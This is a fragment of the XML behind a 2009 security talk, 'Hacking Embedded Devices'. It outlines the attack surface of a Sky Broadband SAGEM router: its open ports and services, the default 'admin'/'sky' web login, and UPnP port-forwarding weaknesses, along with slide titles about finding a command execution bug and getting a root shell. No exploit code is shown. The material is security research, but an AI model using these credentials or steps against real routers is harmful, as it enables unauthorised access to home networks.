              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Everything runs as highest user privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SYSTEM / root (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=0) on all processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A single defect could potentially compromise the platform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Embedded Developers are not Security Conscious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commonly write insecure routines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSRF / XSS  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Design &amp; Logic bugs (e.g. Directory Traversal)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer Overflow Defects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Small number of commonly re-used Libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Devices re-use open-source libraries across platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SNMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UPnP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BusyBox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TinyHttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Micro_Httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> … etc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Sky Broadband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Legalities &amp; Assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Who owns what?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Obtaining Permission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open Source &amp; GPL Code Violations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Security Assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Port Scanning &amp; Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Known UPnP flaws.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examining an information leak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Auditing the Source Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Building Test Cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploiting the bug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Identifying &amp; Exploiting 0day</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Finding a potential flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defeating the limitations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creating a reliable remote root exploit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Legalities &amp;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Consumer broadband devices are typically “leased”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your ISP owns the equipment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You should obtain written permission to assess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try Customer Services, Security Contacts &amp; Chocolates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Violation of Terms &amp; Conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is often used to “silence” researchers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Open-Source &amp; GPL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vendors frequently violate the GPL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vendors release partial GPL source code without modifications. </a:t>
            </a:r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2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4343400" y="1168400"/>
          <a:ext cx="3657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28507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1863/TCP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1864/TCP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4443/TCP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5190/TCP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SIP? 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5566/TCP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30005/TCP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457200" y="254000"/>
            <a:ext cx="3657600" cy="658368"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local Area Network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254000"/>
            <a:ext cx="3657600" cy="658368"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wide Area Network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168400"/>
          <a:ext cx="3674533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533"/>
                <a:gridCol w="2286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FTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> - Disabled.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Telnet -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Disabled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53/TCP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dnsmasq-2.23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micro_httpd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1863/TCP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1864/TCP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4443/TCP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5190/TCP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SIP? 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5431/TCP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UPnP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5566/TCP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30005/TCP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43400" y="4165600"/>
            <a:ext cx="372447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Firmware Version 1.9 Sky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux 2.4.x / Linux 2.6.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SAGEM F@ST2504</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>www default “admin” username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password of “sky” provided.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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UPNP – Known Vulnerabilities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Plug and Play </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be used to automatically configure “stuff”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Known to allow forwarding internal ports externally.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used for configuring port forwarding “on-the-fly”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Miranda is a free UPnP shell tool for auditing.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http://code.google.com/p/mirandaupnptool/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>GNUCitizen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Flash UPnP weakness.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demonstrates that we can send UPnP through Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can forward internal ports to the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We must know where the port is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We must know the IP address we want to forward</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myrouter.home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and 192.168.0.1 are Sky defaults.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1149</TotalTime>
  <Words>1573</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>244</Paragraphs>
  <Slides>26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Hacking Embedded Devices</vt:lpstr>
      <vt:lpstr>What this talk intends to cover!</vt:lpstr>
      <vt:lpstr>What &amp; where are embedded devices?</vt:lpstr>
      <vt:lpstr>Why should I care?</vt:lpstr>
      <vt:lpstr>History repeats itself…</vt:lpstr>
      <vt:lpstr>Case Study: Sky Broadband </vt:lpstr>
      <vt:lpstr>Legalities &amp; Assessment</vt:lpstr>
      <vt:lpstr>Slide 8</vt:lpstr>
      <vt:lpstr>UPNP – Known Vulnerabilities</vt:lpstr>
      <vt:lpstr>UPNP Attacks – miranda example</vt:lpstr>
      <vt:lpstr>UPNP Attacks – Port Mapping</vt:lpstr>
      <vt:lpstr>Use the Source Luke!</vt:lpstr>
      <vt:lpstr>Testing the protection! Test cases!</vt:lpstr>
      <vt:lpstr>Breaking the devices ice with stat()</vt:lpstr>
      <vt:lpstr>A stat() information leak is born!</vt:lpstr>
      <vt:lpstr>Identifying a command execution bug</vt:lpstr>
      <vt:lpstr>Identifying successful exploitation</vt:lpstr>
      <vt:lpstr>Embedded device exploit caveats</vt:lpstr>
      <vt:lpstr>Building the exploit shell</vt:lpstr>
      <vt:lpstr>Run scooby! A root shell is born!</vt:lpstr>
      <vt:lpstr>Users &amp; passwords</vt:lpstr>
      <vt:lpstr>Network sniffer comes built-in!</vt:lpstr>
      <vt:lpstr>File transfer? – Use TFTP!</vt:lpstr>
      <vt:lpstr>What about from the Internet?</vt:lpstr>
      <vt:lpstr>Thin-Clients - Overview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Embedded Devices</dc:title>
  <dc:creator>fantastic</dc:creator>
  <cp:lastModifiedBy>fantastic</cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-10-02T23:00:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-10-03T07:47:43Z</dcterms:modified>
</cp:coreProperties>
</file>